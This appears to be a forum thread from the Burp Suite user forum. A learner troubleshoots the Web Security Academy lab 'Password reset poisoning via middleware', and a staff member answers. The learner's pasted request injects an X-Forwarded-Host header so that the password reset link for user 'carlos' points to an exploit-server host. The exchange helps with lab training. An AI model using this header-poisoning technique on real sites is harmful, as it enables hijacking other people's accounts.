Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Host header not present - Password reset poisoning via middleware

Dennis | Last updated: Mar 25, 2022 01:53AM UTC

Hi, I'm trying to solve to complete the lab "Password reset poisoning via middleware". I sent POST /forgot-password to Repeater and add "X-Forwarded-Host: https://exploit-ac541f6c1f4c0014c001b73d016c00f1.web-security-academy.net" to the request. It looks like this in Repeater: POST /forgot-password HTTP/1.1 Host: aca81fc11fb90044c029b70c00d3002f.web-security-academy.net Cookie: session=r7onTvLunxE8EyQxuIqVXubS51iFgcr7 Content-Length: 15 Cache-Control: max-age=0 Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="99" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: https://aca81fc11fb90044c029b70c00d3002f.web-security-academy.net Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://aca81fc11fb90044c029b70c00d3002f.web-security-academy.net/forgot-password Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 X-Forwarded-Host: https://exploit-ac541f6c1f4c0014c001b73d016c00f1.web-security-academy.net Connection: close username=carlos When I click Send, I get: HTTP/1.1 400 Bad Request Content-Type: application/json; charset=utf-8 Connection: close Content-Length: 25 "Host header not present" According to the video in the community solutions I should get a 200 OK response. I can't figure out what is going wrong here. I also tried to remove "exploit-" at the beginning of the link, which results in the same error. Could you tell me what I'm doing wrong? Thank you.

Hannah, PortSwigger Agent | Last updated: Mar 25, 2022 11:20AM UTC

It looks like you're using a full URL as your X-Forwarded-Host value. Try comparing the value you're using to the existing Host header, and spot the difference between the two.

Dennis | Last updated: Mar 28, 2022 10:06PM UTC

Thank you Hannah! I thought I tried without https:// as well, but apparently not, because it works now. :-)

Hannah, PortSwigger Agent | Last updated: Mar 29, 2022 07:56AM UTC